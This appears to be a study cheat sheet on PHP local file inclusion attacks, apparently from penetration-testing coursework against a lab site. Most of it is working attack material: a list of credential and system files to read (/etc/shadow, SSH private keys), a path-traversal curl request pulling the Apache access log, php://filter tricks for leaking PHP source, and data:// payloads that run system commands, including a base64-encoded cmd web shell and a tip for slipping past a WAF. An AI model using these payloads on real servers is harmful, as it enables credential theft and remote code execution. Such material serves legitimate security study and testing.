/etc/passwd
/etc/shadow
/home/$USER/.ssh/id_rsa
/etc/apache2/sites-enabled/000-default.conf
/var/www/html/index.html
/var/www/html/index.php
/var/log/apache2/access.log
# Windows
C:\\Windows\\System32\\drivers\\etc\\hosts
<https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt>
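The User-Agent header is included in each log entry. It is client-supplied, so the access log holds untrusted input and should not be readable through the application's include path.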
kali@kali:~$ curl <http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log>
...
192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
...


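php://filter/resource=[file].php ⇒ display contents of PHP file (with no conversion filter the included PHP is still executed, so only its rendered output is shown)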
php://filter/convert.base64-encode/resource=[file].php
data://text/plain,<?php[code]?> ⇒ run PHP code
data://text/plain;base64,[base64] ⇒ run base 64 encoded PHP code
data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls
php://filter # include the contents of a file
# wrapper
<http://example.com/wook/index.php?page=php://filter/resource=admin.php>
# converts to base64
<http://example.com/wook/index.php?page=php://filter/convert.base64-encode/resource=admin.php>
The allow_url_include setting needs to be enabled for the data:// wrapper below (it is Off by default in PHP).
data:// # achieve code execution
# wrapper
curl "http://example.com/wook/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
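# when a WAF or other security mechanisms are in place, the payload can be base64-encoded; signature rules should therefore match the data:// scheme in the parameter, not just payload keywords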
echo -n '<?php echo system($_GET['cmd']); ?>' | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
curl "<http://example.com/wook/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls>"